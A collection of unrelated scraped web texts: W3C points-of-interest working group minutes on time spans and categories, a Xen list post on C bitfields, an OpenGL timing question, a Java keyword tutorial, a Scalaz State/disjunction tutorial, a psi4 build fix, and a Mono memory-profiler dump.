martinL: I think it should be one of the examples, you might have one POI with a time slider.
ahill: If I am driving down the street, I see the church, not the sub POIs, the altar, toilet, etc. I'm interested in the church, now and I'm sliding through time and these things become obvious and apparent.
<danbri> ronald, re calendar/rdf stuff also
<danbri> ...and microformat markup for events
Thomas: The specs for times seem pretty good.
ahill: We don't have the spec for it yet from us.
Ronald: If we're talking about existence then a single time span is sufficient. The other use cases where it's opening hours and things that change, then that's different.
cperey: Should it be in the spec?
ahill: In practical use for these things a time span is something you can include, and if you don't include it, it's right now and permanent.
... If you have one time span, then you could imagine that being a situation where you could see two of them.
... If two time spans get delivered with a POI, there's just two time spans, what would it break? There's not a parent/child relationship.
Thomas: So you'd treat them as an or relationship?
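The OR reading of multiple delivered time spans can be sketched directly: the POI applies if any one of its spans contains the query time. The `(begin, end)` date-pair representation and the helper are invented for illustration.

```python
from datetime import date

# Sketch of OR-ed time spans: a POI with several independent spans
# applies whenever any span contains the query date. Representation
# and sample spans are invented.
spans = [(date(2011, 3, 1), date(2011, 3, 15)),
         (date(2011, 4, 1), date(2011, 4, 15))]

def applies(d, spans):
    """True if date d falls inside at least one (begin, end) span."""
    return any(b <= d <= e for b, e in spans)

print(applies(date(2011, 4, 5), spans))   # True: inside the second span
print(applies(date(2011, 3, 20), spans))  # False: between the two spans
```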
ahill: Talk of "will that hot dog stand be there?" is really about future things and not real time.
Thomas: Do we have a proposed format?
ahill: I think we can look at what's here and figure it out.
cperey: And then apply it to the use cases.
ahill: We're going to have a POI time, we've got a fundamental unit of time. It doesn't describe a duration.
... I think it just says a duration of two hours, rather than a start/end time.
... I think if the spec we looked at had a begin/end time then KML would have used it.
<danbri> re times, for content
[[caldav seems to have a time-range defined]]
cperey: We had a discussion about location changing over time. We talked about having locations good for specific durations.
... The side of the bus is only valid while it's moving through this geo location.
martinL: That would be a property animation?
Thomas: We talked about having an ad appear at this location.
-> W3C Schools (no relation) sample elements for a date range.
<JonathanJ> 1. present condition (periodical) 2. historical condition (duration), 3. acting condition (irregularity)
Ronald: I remember this discussion and don't remember the outcome. Do we store the entire history, or not?
ahill: I think we can say we don't store the history in the POI.
... KML breaks some of these apart too. Not necessarily embedded.
Thomas: Merely having a date span then you have the possibility of history through multiple POIs. Assign them to different dates with same location.
ahill: You can use a POI to do that, or not. Or you could have metadata to do it in one POI. You don't have to use it either way.
Thomas: Then you have to be very precise in the metadata itself. It becomes not metadata but data.
... The metadata should be describing the content, not the content.
<danbri> "The distinction between "data" and "metadata" is not an absolute one; it is a distinction created primarily by a particular application, and many times the same resource will be interpreted in both ways simultaneously."
Thomas: A building that has different shapes at different dates and times.
ahill: This strikes me as different representations.
Thomas: Not really.
<danbri>
<danbri> :)
ahill: The London Bridge is now in Arizona.
... If I remodel my house, it's still my house. Some people are not going to like the idea that it's a different POI.
... If POIs have URIs, then people are going to want to have a stable URI to describe the building.
... Your proposed solution does not solve everything.
Thomas: Yours would have multiple time stamps that seems more complex than new POIs.
matt: I think there are use cases for both. If you want a historical slider, you include multiple time stamps, and if you want a canonical representation of the house now, then you don't put in multiple timestamps.
ahill: Thomas you're also assuming that the model has to be tied to the POI. There could be a separation, could be from a different database, different metadata.
Thomas: They'd be different POIs then.
ahill: I think this is semantics.
danbri: What are we talking about?
ahill: There are two constituencies, one that wants historical and one that wants permanence.
Thomas: If you don't want the history then you could have it be on POI, but if you want history then you want multiple POIs.
<danbri> matt, good question
ahill: There was some convention for mutation of points.
martinL: Essentially we're talking about the visualization changes over time.
... We have the data and the visualizations are different.
Thomas: No. I see this as the same as CSS and HTML. Different things sent to different clients based on specs or whatever criteria.
... If you've got data associated with it, that too is a piece of data.
... My instinct is different POIs with different time spans.
ahill: The spec will let both work.
Thomas: Then you have to be prepared to spec out multiple timespans. Is that ok?
ahill: Yes.
Ronald: Didn't we agree that the history is outside of the spec?
ahill: Yes, but we're using "history" in different senses here.
matt: We've been talking about these primitives as a building block that can be used in different ways.
ahill: So we've been saying that the POI might have a time and the location may have a time.
... It's a bit of a can of worms.
-> GML begin/end
<ahill>
ahill: If in the end we get something that's very close to GML, I think that's OK.
... This could be very similar to what we did with KHARML and KML. We had things we needed to add.
PROPOSED RESOLUTION: The world is complicated.
<JonathanJ> +1
+1
<danbri> oh, 'Profiling GML for RSS/Atom, RDF and Web developers' finally relevant ;)
-> GML subset tools
<scribe> scribe: Ronald
<danbri> discussing ... GML subset tool
ahill: we need to move on, but we also need to capture our discussion
... are the notes ok, or do we need to write the document
martin: we might be able to make focus groups to write it out
matt: we might not have to do it today, but I like the fact of teaming up people
martin: I volunteer for the timespan
thomas: I can help
<matt> ACTION: martinL to work on time spans with Thomas [recorded in]
<trackbot> Sorry, couldn't find user - martinL
<matt> ACTION: martin to work on time spans with Thomas [recorded in]
<trackbot> Created ACTION-43 - Work on time spans with Thomas [on Martin Lechner - due 2011-04-06].
ahill: I remember that someone said openstreetmap has a time definition as well
jacques: for opening hours for shopping centers, not XML, but in text
... it is very easy and compact
luca: we should prepare some use case to define the timestamp to check whether each language is good or not
... for example, for movie show times, we need to decide what is in scope or out of scope
ahill: talking to Dan, we were looking into creating some examples in Mercurial
<matt> ACTION: Alex to place some examples in mercurial [recorded in]
<trackbot> Created ACTION-44 - Place some examples in mercurial [on Alex Hill - due 2011-04-06].
luca: my question was because the discussion was very wide regarding the POI we can describe, but we should start with something easy to get started
... and maybe in the second draft add other use cases
<danbri> we have to start simple for starters, maybe with a bias towards re-using nearby related specs (like icalendar)
luca: this can be applied to any primitive. Just to move forward and make decisions
matt: thinking of creating an issue for time and spans
<matt> POI tracker
ronald: but are all the primitives issues?
matt: yes, we should be closing them one by one
<Luca> icalendar
<matt> some notes on time primitive
matt: where do we want to gather requirements for the time primitive?
<danbri> (re terminology: icalendar is the ietf data format spec; caldev is a web-dav based protocol for managing a calendar, ... and 'ical' used to be a nickname for it, until Apple named their icalendar-compatible app 'ical' too)
<JonathanJ> icalendar spec -
thomas: we also need to pick a name for the field. 'time' or 'timerange'
ahill: if anyone else already has a spec for time, what do we do with it. Reuse it directly, or renaming things and embed it in our spec?
thomas: we can include it. I don't think it is copyrighted
ahill: but things are namespaced. Are we ok combining different kinds of namespaces?
<matt> trackbot, close action-3232
<trackbot> Sorry... closing ACTION-3232 failed, please let sysreq know about it
<matt> trackbot, close action-32
<trackbot> ACTION-32 Invite Henning after Matt has put ID requirements in the wiki closed
bertine: we need to be careful there is not any slight difference in meaning
thomas: we should not make something different, just to make something different
ahill: GML, KML refer to ISO for timestamps, but it is a more fundamental concept
... in KML, there is a time primitive, which is an abstract class of which timestamp and timespan extend
thomas: does their timespan combine two time primitives?
ahill: in their context not really
martin: what would be the desired outcome of a focus group
matt: for editorial stuff, I am going to be a gatekeeper
... we will propose text on the mailing list, and I will put it in the wiki
... please include the text ISSUE-7 in the subject or body of the message for tracking
martin: ISSUE-7 or ACTION-43
matt: there are multiple actions to an issue, so discussion on the issue without closing an action
thomas: are we ready to move to the next item
alex: let's talk about categories
<matt> Category Primitive
christine: we talked about categories before, and the general thinking was
cperey: IETF and ? have done a lot of work on documenting not just places of interest
... they have their own structure for categories
... governments and international bodies have their own category systems, hierarchical systems, beautiful systems
<ahill>
cperey: it is unlikely that we as an organization pick one system
... we are insufficient domain experts
... there are experts out there, but not at our table. Henning has not replied and does not seem interested
thomas: is category going to be a required field
ahill: no
... it is not required, but in most cases it is valueable
<matt> PROPOSED RESOLUTION: Category primitive is NOT required
ahill: I can imagine a character string "category", but it is not going to solve the problem. For example we might need to support multiple categories
... we might need to make our own category, and people can choose to ignore
cperey: but it is better to reuse existing category systems
thomas: it could just be a link
cperey: exactly
thomas: a POI needs to be able to have multiple categories and these categories should be URIs
<matt> PROPOSED RESOLUTION: Category primitive is NOT required. Category can be identified by a URI. POIs can have more than one category.
cperey: if we just specify it this way, we don't need to invite an expert to come talk to us... it is an implementation detail
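The proposed resolution above (categories optional, identified by URI, more than one allowed) can be sketched in a few lines. The dataclass and the sample category URIs are invented for illustration; the meaning of each URI is left to whichever category system it points into.

```python
from dataclasses import dataclass, field

# Sketch of the category resolution: zero or more category URIs per POI.
# The POI class and example.org URIs are invented sample structures.
@dataclass
class POI:
    name: str
    categories: list = field(default_factory=list)  # optional category URIs

poi = POI("Hot dog stand",
          categories=["http://example.org/categories/food",
                      "http://example.org/categories/street-vendor"])
print(len(poi.categories))  # 2
```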
ahill: at some stage we need to work out the meaning
<matt> Good Relations categories
thomas: there are also simple formatting issues, e.g. comma-separated list or multiple entries
ahill: how about an action item of finding an example of a system using different category systems
<danbri>
thomas: we should just focus on allowing linking, and not go into the meaning. that is up to the systems
<danbri> hot dog stand:
matt: can you walk me through the bestbuy example
<matt> [[<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" ""><html xmlns=""
danbri: it is a particular store, if you view source and search for "property="
<matt> xmlns:rdfs=""
<matt> xmlns:dc=""
<matt> xmlns:xsd=""
<matt> xmlns:foaf=""
<matt> xmlns:gr=""
<matt> xmlns:geo=""
<matt> xmlns:v=""
danbri: you find lat lon, twitter account
<matt> xmlns:<head profile=""><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /]]
danbri: they also have it on products they sell
ahill: should we go to a product page
danbri: would not bother now, but we can expect that data to be on the web and there should be links from the POI information
<matt> [[<div class="column right"><div class="hours" rel="gr:hasOpeningHoursSpecification"><h3>Store Hours</h3><ul><li class="day0" typeof="gr:OpeningHoursSpecification" about="#storehours_sun"> <span rel="gr:hasOpeningHoursDayOfWeek" resource="" class="day">Sun</span>]]
ahill: I want to look at an implementation that uses categories
matt: I see they are using opening hours from the good relations
thomas: but we are not looking at opening hours yet from the time primitive
<ahill>
ahill: when I went here, the website shows a category, but in the source I can't see any link to categories
... I need an example. I have the feeling we need a dictionary or a schema to define what the category is and where it is in the category hierarchy
<matt> [[I suggest we install the RDFa bookmarklet and use that instead of view source: ]]
danbri: library classification schemes don't work that well as category scheme
... it is not really a thing in a category. it is a bit fuzzy
... it is thesaurus type stuff
... skos
<danbri>
<matt> Best Buy example
danbri: if the POI is art related, the category will be using skos
<JonathanJ> +1
<danbri>
danbri: if it is representing things, rdf uses different mechanics
<danbri>
<danbri>
<bertine>
<matt> scribe: matt
danbri: The resource itself is:
... But the page is
<scribe> scribe: Ronald
danbri: YAGO is an ontology on top of Wikipedia
... is explaining dbpedia
thomas: is a broader term a parent type?
danbri: it is not really hierarchical
cperey: librarians have their own standardisation systems
<danbri>
<danbri>
<danbri> a smooth-textured sausage of minced beef or pork usually smoked; often served on a bread roll ('en' language string)
<matt> Linked Data Cloud diagram
<danbri>
danbri: most of the data sets are structured similarly
<danbri>
danbri: we don't need to choose
<danbri> try sindice.com
<danbri>
<cperey> NFAIS Standards
<cperey>
thomas: can I ask yahoo for green fruit. the linked data is not really used fully yet
<danbri>
ahill: until I feel that google is doing something other than proprietary mapping, I did not think the web is linked
matt: we are talking about categorization, right?
<matt> categorization primitive
thomas: there is potentially infinite categories, so using URIs seems a reasonable solution
<matt> Thread on cat primitive
<danbri> (you can probably use to define a query for green fruit)
thomas: do we need to create an action point to decide what form to use.
ahill: if someone else has figured out time, and someone else categories... do we add a wrapper around it or recommend to use these specs
... do we need a wrapper that says this is a POI
<matt> Karl's document on categories
ahill: is it some sort of key-value pair?
thomas: there needs to be an identifying string saying this is a POI
... it may be the nature of the transmission that assumes it is a POI, but it depends on how it is used
... if an AR browser gets information from a server, it can assume it is a POI, but if it is on the web, we need to know it is a POI
<matt> [[This category description does not replace existing industry classification models, rather it enables reference to such standards and local domain derivations from such standards as:...]] -- Karl's document
<danbri> proposal: "The WG agrees that integrates existing deployed practice, as well as describing how to use Linked Data (skos, dbpedia etc.) for such tasks.
ahill: if all we end up with is a bunch of existing standards, do we need to invent something around it
thomas: do we need a version of it, or is it implicit?
<JonathanJ> +1
thomas: do we include the fact that a POI can have more than one category?
danbri: I see that as something implicit
cperey: does this mean that we do not need a core primitive?
<matt> PROPOSED: ... practice, as well as describing how to use Linked Data (skos, dbpedia etc.) for such tasks.
ahill: we may not need to have a structure
cperey: how do we decide it is expressed like that?
ahill: by convention
cperey: is there an action to decide what the convention is?
<danbri> I could write <dbpedia:HotDogStand ...
matt: let's go back to an earlier resolution that I wrote a while ago
<matt> RESOLUTION: Category primitive is not required.
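To make the resolution concrete, here is a minimal sketch (my own illustration, not from the minutes; the field names are hypothetical, not part of any W3C draft) of a POI record whose optional category field holds one or more URIs:

```python
# Hypothetical POI record: "categories" is optional and, when present,
# holds one or more category URIs (per the resolution above).
poi = {
    "name": "Example hot dog stand",
    "lat": 33.78,
    "lon": -84.39,
    "categories": [
        "http://dbpedia.org/resource/Hot_dog_stand",
        "http://example.org/cat/street-food",  # hypothetical local scheme
    ],
}

def category_uris(record):
    # Category is not required, so default to an empty list.
    return record.get("categories", [])

print(len(category_uris(poi)))        # 2
print(category_uris({"name": "x"}))   # []
```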
danbri: if a POI is a category, it is a boring category. so category is optional
<jacques> amenitie=stand cuisine=hotdog in OSM
<matt> Karl's doc
matt: let's look at the examples
... using URIs makes it easy to refer to categories from dbpedia
cperey: the proposal says one or more, but we just backed off and said none required
... we could have one... a useless one
danbri: that would be just "POI"
cperey: not sure what is the right way of treating it
martin: if you don't want to specify, you should be able to leave it
[Source: http://www.w3.org/2011/03/30-poiwg-minutes.html]
>>> On 31.10.18 at 10:27, <Paul.Durrant@xxxxxxxxxx> wrote:
>> From: Roger Pau Monne
>> Sent: 31 October 2018 08:54
>>
>> On Tue, Oct 30, 2018 at 05:11:30PM +0000, Paul Durrant wrote:
>> > > From: Roger Pau Monne
>> > > Sent: 30 October 2018 17:09
>> > >
>> > > On Mon, Oct 29, 2018 at 06:02:10PM +0000, Paul Durrant wrote:
>> > > > ---.
I'm afraid I disagree with this view of yours: A field of the form
"uint32_t x:1" does not reserve the following 31 bits. That's in
part because types other than plain, signed, or unsigned int as
well as bool aren't allowed by the base C standard anyway for
bit fields; allowing them is a (quite common) compiler extension
(and there are actually quirks when it comes to using types
wider than int, but a bit count not specifying more bits than an
int can hold). Just look at the resulting code of this example:
#include <stddef.h>
#include <stdint.h>

struct s {
    uint32_t x:1;
    char c;
};

unsigned test(void) {
    return offsetof(struct s, c);
}
[Source: https://lists.xenproject.org/archives/html/xen-devel/2018-10/msg02569.html]
I'm developing a game using OpenGL and have run into a strange issue. Exactly 30 seconds after creating a context, the frame time increases by 2 - 3x depending on the scene, and then remains constant. I am using query objects with GL_TIME_ELAPSED to get the frame time. Below is a small demo that demonstrates the issue.
I know I shouldn't be using glBegin/glEnd; my actual game uses vertex buffers and the issue is exactly the same. I've also tried using GLFW, but the exact same thing happened. Code:
#include <stdio.h>
#include <GL/glew.h>
#include <GL/freeglut.h>

int main(int argc, char** argv)
{
    glutInit(&argc, argv);
    glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE);
    glutCreateWindow("Frame time test");
    glewExperimental = GL_TRUE;
    glewInit();

    GLuint query;
    glGenQueries(1, &query);

    while (1) {
        glClear(GL_COLOR_BUFFER_BIT);

        glBeginQuery(GL_TIME_ELAPSED, query);
        glBegin(GL_TRIANGLES);
        glVertex3f(-1, -1, 0);
        glVertex3f(1, -1, 0);
        glVertex3f(0, 1, 0);
        glEnd();
        glEndQuery(GL_TIME_ELAPSED);

        GLuint drawTime;
        glGetQueryObjectuiv(query, GL_QUERY_RESULT, &drawTime);

        char timeStr[32];
        sprintf(timeStr, "%f", drawTime / 1000000.0f);
        glutSetWindowTitle(timeStr);

        glutSwapBuffers();
        glutMainLoopEvent();
    }
    return 0;
}
Is there something I'm doing wrong, or is this a driver bug? I've been doing OpenGL development for quite a while and have never seen this before.
I'm on Linux with a NVIDIA GTX 560 Ti that has the latest drivers (310.19).
[Source: https://www.opengl.org/discussion_boards/printthread.php?t=179686&pp=10&page=1]
The package keyword

The package keyword in the Java programming language is used to define a package that groups related Java classes. Keywords are reserved words with a specific meaning to the compiler. To place a class in a package, we write the keyword package followed by the package name at the very top of the source file:

package world;

public class HelloWorld {
    public static void main(String... args) {
        ...
    }
}

Create Your Own Package

The package to which a source file belongs is specified with the keyword package at the top of the source file, before the code that defines the actual classes in the package.

Private Java Keyword

private is a keyword defined in the Java programming language. Members declared with no access modifier have package access; a private member is accessible only within its own class.

Public Java Keyword

public is a keyword defined in the Java programming language. A public member is accessible from any other class.

Protected Java Keyword

protected is a keyword defined in the Java programming language. A protected member is accessible within its own package and from subclasses.

The double Keyword

double is a Java keyword that may not be used as an identifier. The wrapper class associated with the double data type is called Double and is defined in the java.lang package.

The import Keyword

The import statement makes one class, or all the classes, in a package available by their simple names. Alternatively, a class can be referred to by its fully-qualified name without any import.

Keyword - this

A keyword is a word having a particular meaning to the programming language. The this keyword refers to the current object, i.e. the object on which the method was invoked.

Using throw keyword in exception handling in Core Java

The throw keyword is used to throw an exception explicitly. The thrown exception is then handled by the calling method or by a surrounding try/catch block.
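Putting the pieces above together, here is a minimal sketch (the package name world is just an example): a source file in package world would begin with the package statement, and the import keyword brings a class from another package into scope.

```java
// A source file belonging to package `world` would start with:
//     package world;
// (it must be the first statement, before any class definitions).
// The import keyword then makes a class from another package
// available by its simple name:
import java.util.Arrays;

public class HelloWorld {
    public static void main(String... args) {
        // Arrays comes from the java.util package via the import above.
        System.out.println(Arrays.toString(new int[] {1, 2, 3}));
    }
}
```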
[Source: http://www.roseindia.net/discussion/24427-The-package-keyword.html]
learning Scalaz: day 7
Hey there. There's an updated html5 book version, if you want.
On day 6 we reviewed
for syntax and checked out the
Writer monad and the reader monad, which is basically using functions as monads.
Applicative Builder
One thing I snuck in while covering the reader monad is the Applicative builder
|@|. On day 2 we introduced the ^(f1, f2) {...} style added in 7.0.0-M3, but that does not seem to work for functions or any type constructor with two parameters.
The discussion on the Scalaz mailing list seems to suggest that
|@| will be undeprecated, so that's the style we will be using, which looks like this:
scala> (3.some |@| 5.some) {_ + _} res18: Option[Int] = Some(8) scala> val f = ({(_: Int) * 2} |@| {(_: Int) + 10}) {_ + _} f: Int => Int = <function1>
Tasteful stateful computations
Learn You a Haskell for Great Good says:
Haskell features a thing called the state monad, which makes dealing with stateful problems a breeze while still keeping everything nice and pure.
Let's implement the stack example. This time I am going to translate Haskell into Scala without making it into case class:
scala> type Stack = List[Int] defined type alias Stack scala> def pop(stack: Stack): (Int, Stack) = stack match { case x :: xs => (x, xs) } pop: (stack: Stack)(Int, Stack) scala> def push(a: Int, stack: Stack): (Unit, Stack) = ((), a :: stack) push: (a: Int, stack: Stack)(Unit, Stack) scala> def stackManip(stack: Stack): (Int, Stack) = { val (_, newStack1) = push(3, stack) val (a, newStack2) = pop(newStack1) pop(newStack2) } stackManip: (stack: Stack)(Int, Stack) scala> stackManip(List(5, 8, 2, 1)) res0: (Int, Stack) = (5,List(8, 2, 1))
State and StateT
LYAHFGG:
We'll say that a stateful computation is a function that takes some state and returns a value along with some new state. That function would have the following type:
s -> (a, s)
The important thing to note is that unlike the general monads we've seen,
State specifically wraps functions. Let's look at
State's definition in Scalaz:
type State[S, +A] = StateT[Id, S, A] // important to define here, rather than at the top-level, to avoid Scala 2.9.2 bug object State extends StateFunctions { def apply[S, A](f: S => (S, A)): State[S, A] = new StateT[Id, S, A] { def apply(s: S) = f(s) } }
As with
Writer,
State[S, +A] is a type alias of
StateT[Id, S, A]. Here's the simplified version of
StateT:
trait StateT[F[+_], S, +A] { self => /** Run and return the final value and state in the context of `F` */ def apply(initial: S): F[(S, A)] /** An alias for `apply` */ def run(initial: S): F[(S, A)] = apply(initial) /** Calls `run` using `Monoid[S].zero` as the initial state */ def runZero(implicit S: Monoid[S]): F[(S, A)] = run(S.zero) }
We can construct a new state using
State singleton:
scala> State[List[Int], Int] { case x :: xs => (xs, x) } res1: scalaz.State[List[Int],Int] = scalaz.package$State$$anon$1@19f58949
Let's try implementing the stack using
State:
scala> type Stack = List[Int] defined type alias Stack scala> val pop = State[Stack, Int] { case x :: xs => (xs, x) } pop: scalaz.State[Stack,Int] scala> def push(a: Int) = State[Stack, Unit] { case xs => (a :: xs, ()) } push: (a: Int)scalaz.State[Stack,Unit] scala> def stackManip: State[Stack, Int] = for { _ <- push(3) a <- pop b <- pop } yield(b) stackManip: scalaz.State[Stack,Int] scala> stackManip(List(5, 8, 2, 1)) res2: (Stack, Int) = (List(8, 2, 1),5)
Using
State[List[Int], Int] {...} we were able to abstract out the "extract state, and return value with a state" portion of the code. The powerful part is the fact that we can monadically chain each operations using
for syntax without manually passing around the
Stack values as demonstrated in
stackManip above.
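For readers following along without a Scala REPL, the "state in, (state, value) out" shape that State wraps can be mimicked in plain Python (a rough sketch of the manual state-threading version, not Scalaz):

```python
# Each stateful step is a function: stack -> (new_stack, value).
def pop(stack):
    head, *rest = stack
    return rest, head

def push(a, stack):
    return [a] + stack, None

def stack_manip(stack):
    # Manually threading the state, like the first Haskell-style example.
    stack, _ = push(3, stack)
    stack, _a = pop(stack)
    return pop(stack)

print(stack_manip([5, 8, 2, 1]))  # ([8, 2, 1], 5), as in the Scala session
```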
Getting and setting state
LYAHFGG:
The
Control.Monad.Statemodule provides a type class that's called
MonadStateand it features two pretty useful functions, namely
getand
put.
The
State object extends
StateFunctions trait, which defines a few helper functions:
trait StateFunctions { def constantState[S, A](a: A, s: => S): State[S, A] = State((_: S) => (s, a)) def state[S, A](a: A): State[S, A] = State((_ : S, a)) def init[S]: State[S, S] = State(s => (s, s)) def get[S]: State[S, S] = init def gets[S, T](f: S => T): State[S, T] = State(s => (s, f(s))) def put[S](s: S): State[S, Unit] = State(_ => (s, ())) def modify[S](f: S => S): State[S, Unit] = State(s => { val r = f(s); (r, ()) }) /** * Computes the difference between the current and previous values of `a` */ def delta[A](a: A)(implicit A: Group[A]): State[A, A] = State{ (prevA) => val diff = A.minus(a, prevA) (diff, a) } }
These are confusing at first. But remember
State monad encapsulates functions that takes a state and returns a pair of a value and a state. So
get in the context of state simply means to retrieve the state into the value:
def init[S]: State[S, S] = State(s => (s, s)) def get[S]: State[S, S] = init
And
put in this context means to put some value into the state:
def put[S](s: S): State[S, Unit] = State(_ => (s, ()))
To illustrate this point, let's implement
stackyStack function.
scala> def stackyStack: State[Stack, Unit] = for { stackNow <- get r <- if (stackNow === List(1, 2, 3)) put(List(8, 3, 1)) else put(List(9, 2, 1)) } yield r stackyStack: scalaz.State[Stack,Unit] scala> stackyStack(List(1, 2, 3)) res4: (Stack, Unit) = (List(8, 3, 1),())
We can also implement
pop and
push in terms of
get and
put:
scala> val pop: State[Stack, Int] = for { s <- get[Stack] val (x :: xs) = s _ <- put(xs) } yield x pop: scalaz.State[Stack,Int] = scalaz.StateT$$anon$7@40014da3 scala> def push(x: Int): State[Stack, Unit] = for { xs <- get[Stack] r <- put(x :: xs) } yield r push: (x: Int)scalaz.State[Stack,Unit]
As you can see a monad on its own doesn't do much (encapsulate a function that returns a tuple), but by chaining them we can remove some boilerplates.
Error error on the wall
LYAHFGG:
The
Either e atype on the other hand, allows us to incorporate a context of possible failure to our values while also being able to attach values to the failure, so that they can describe what went wrong or provide some other useful info regarding the failure.
\/
We know
Either[A, B] from the standard library, but Scalaz 7 implements its own
Either equivalent named
\/:
sealed trait \/[+A, +B] { ... /** Return `true` if this disjunction is left. */ def isLeft: Boolean = this match { case -\/(_) => true case \/-(_) => false } /** Return `true` if this disjunction is right. */ def isRight: Boolean = this match { case -\/(_) => false case \/-(_) => true } ... /** Flip the left/right values in this disjunction. Alias for `unary_~` */ def swap: (B \/ A) = this match { case -\/(a) => \/-(a) case \/-(b) => -\/(b) } /** Flip the left/right values in this disjunction. Alias for `swap` */ def unary_~ : (B \/ A) = swap ... /** Return the right value of this disjunction or the given default if left. Alias for `|` */ def getOrElse[BB >: B](x: => BB): BB = toOption getOrElse x /** Return the right value of this disjunction or the given default if left. Alias for `getOrElse` */ def |[BB >: B](x: => BB): BB = getOrElse(x) /** Return this if it is a right, otherwise, return the given value. Alias for `|||` */ def orElse[AA >: A, BB >: B](x: => AA \/ BB): AA \/ BB = this match { case -\/(_) => x case \/-(_) => this } /** Return this if it is a right, otherwise, return the given value. Alias for `orElse` */ def |||[AA >: A, BB >: B](x: => AA \/ BB): AA \/ BB = orElse(x) ... } private case class -\/[+A](a: A) extends (A \/ Nothing) private case class \/-[+B](b: B) extends (Nothing \/ B)
These values are created using
right and
left method injected to all data types via
IdOps:
scala> 1.right[String] res12: scalaz.\/[String,Int] = \/-(1) scala> "error".left[Int] res13: scalaz.\/[String,Int] = -\/(error)
The
Either type in Scala standard library is not a monad on its own, which means it does not implement
flatMap method with or without Scalaz:
scala> Left[String, Int]("boom") flatMap { x => Right[String, Int](x + 1) } <console>:8: error: value flatMap is not a member of scala.util.Left[String,Int] Left[String, Int]("boom") flatMap { x => Right[String, Int](x + 1) } ^
You have to call
right method to turn it into
RightProjection:
scala> Left[String, Int]("boom").right flatMap { x => Right[String, Int](x + 1)} res15: scala.util.Either[String,Int] = Left(boom)
This is silly since the point of having
Either is to report an error on the left. Scalaz's
\/ assumes that you'd mostly want right projection:
scala> "boom".left[Int] >>= { x => (x + 1).right } res18: scalaz.Unapply[scalaz.Bind,scalaz.\/[String,Int]]{type M[X] = scalaz.\/[String,X]; type A = Int}#M[Int] = -\/(boom)
This is nice. Let's try using it in
for syntax:
scala> for { e1 <- "event 1 ok".right e2 <- "event 2 failed!".left[String] e3 <- "event 3 failed!".left[String] } yield (e1 |+| e2 |+| e3) res24: scalaz.\/[String,String] = -\/(event 2 failed!)
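The short-circuiting in the for comprehension above can be sketched in plain Python (my own illustration, not Scalaz): bind applies the function only to a right, while a left passes through unchanged.

```python
# Right-biased bind over a tagged pair ("left"|"right", value).
def bind(e, f):
    tag, value = e
    return f(value) if tag == "right" else e

result = bind(("right", "event 1 ok"),
              lambda e1: bind(("left", "event 2 failed!"),
                              lambda e2: ("right", e1 + e2)))
print(result)  # ('left', 'event 2 failed!') -- the first failure wins
```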
As you can see, the first failure rolls up as the final result. How do we get the value out of
\/? First there's
isRight and
isLeft method to check which side we are on:
scala> "event 1 ok".right.isRight res25: Boolean = true scala> "event 1 ok".right.isLeft res26: Boolean = false
For right side, we can use
getOrElse and its symbolic alias
| as follows:
scala> "event 1 ok".right | "something bad" res27: String = event 1 ok
For left value, we can call
swap method or its symbolic alias
unary_~:
scala> ~"event 2 failed!".left[String] | "something good" res28: String = event 2 failed!
We can use
map to modify the right side value:
scala> "event 1 ok".right map {_ + "!"} res31: scalaz.\/[Nothing,String] = \/-(event 1 ok!)
To chain on the left side, there's
orElse, which accepts
=> AA \/ BB where
[AA >: A, BB >: B]. The symbolic alias for
orElse is
|||:
scala> "event 1 failed!".left ||| "retry event 1 ok".right res32: scalaz.\/[String,String] = \/-(retry event 1 ok)
Validation
Another construct comparable to \/ is Validation; unlike \/, it can accumulate failures, typically in a NonEmptyList.
[Source: http://eed3si9n.com/learning-scalaz-day7]
I downloaded the ZIP and followed the build instructions:
./setup objdir
cd objdir
make -j`getconf _NPROCESSORS_ONLN`
and error occured during compile
....../psi4public-master/src/bin/psi4/python.cc:750:12: error: use of undeclared identifier 'GIT_VERSION'
    return GIT_VERSION;
           ^
1 error generated.
make[2]: *** [src/bin/psi4/CMakeFiles/versioned_code.dir/python.cc.o] Error 1
make[1]: *** [src/bin/psi4/CMakeFiles/versioned_code.dir/all] Error 2
any suggestion?
Build environment: mac 10.10
clone git resolve issue.
Yes, sorry about that. Consequence of ZIP source not being under git control. I'm still trying to figure out how to convey the git-dependent version number to the ZIP file, but if you modify the else branch in src/bin/psi4/gitversion.py according to below, it will actually build.
def write_version(branch, mmp, ghash, status):
if ghash:
version_str = "#define GIT_VERSION \"{%s} %s %s\"\n" % \
(branch, ghash, status)
else:
version_str = "#define GIT_VERSION \"{%s} %s %s\"\n" % \
('(no tag)', '', '')
This is fixed now (in that it'll compile and give minimal versioning info) as of d1a2493, but you're better off with the clone anyway, in that it's easier to get updates.
[Source: http://forum.psicode.org/t/undefined-git-version/61]
I've been working with the Task.Factory.FromAsync() methods and have been experiencing severe memory leakage. I've used the profiler and it shows that a lot of objects just seem to be hanging around after use:
Heap shot 140 at 98.591 secs: size: 220177584, object count: 2803125, class count: 98, roots: 666
Bytes Count Average Class name
25049168 142325 175 System.Threading.Tasks.Task<System.Int32> (bytes: +398816, count: +2266)
1 root references (1 pinning)
142324 references from: System.Threading.Tasks.Task
142305 references from: System.Threading.Tasks.TaskCompletionSource<System.Int32>
98309 references from: task_test.Task3Test.<Run>c__AnonStorey1
25049024 142324 176 System.Threading.Tasks.Task (bytes: +398816, count: +2266)
142304 references from: System.Threading.Tasks.TaskContinuation
17078880 142324 120 System.Action<System.Threading.Tasks.Task<System.Int32>> (bytes: +271920, count: +2266)
142324 references from: System.Threading.Tasks.TaskActionInvoker.ActionTaskInvoke<System.Int32>
17076600 142305 120 System.Runtime.Remoting.Messaging.MonoMethodMessage (bytes: +271680, count: +2264)
1 root references (1 pinning)
142304 references from: System.MonoAsyncCall
17076584 142305 119 System.AsyncCallback (bytes: +271920, count: +2266)
1 root references (1 pinning)
142304 references from: System.MonoAsyncCall
17076584 142305 119 System.Func<System.Int32> (bytes: +271920, count: +2266)
1 root references (1 pinning)
142305 references from: System.Func<System.IAsyncResult,System.Int32>
142304 references from: System.Runtime.Remoting.Messaging.AsyncResult
1 references from: System.Func<System.AsyncCallback,System.Object,System.IAsyncResult>
17076584 142305 119 System.Func<System.IAsyncResult,System.Int32> (bytes: +271920, count: +2266)
1 root references (1 pinning)
142305 references from: System.Threading.Tasks.TaskFactory.<FromAsyncBeginEnd>c__AnonStorey3A<System.Int32>
17076480 142304 120 System.Runtime.Remoting.Messaging.AsyncResult (bytes: +271800, count: +2265)
98461 references from: System.Object[]
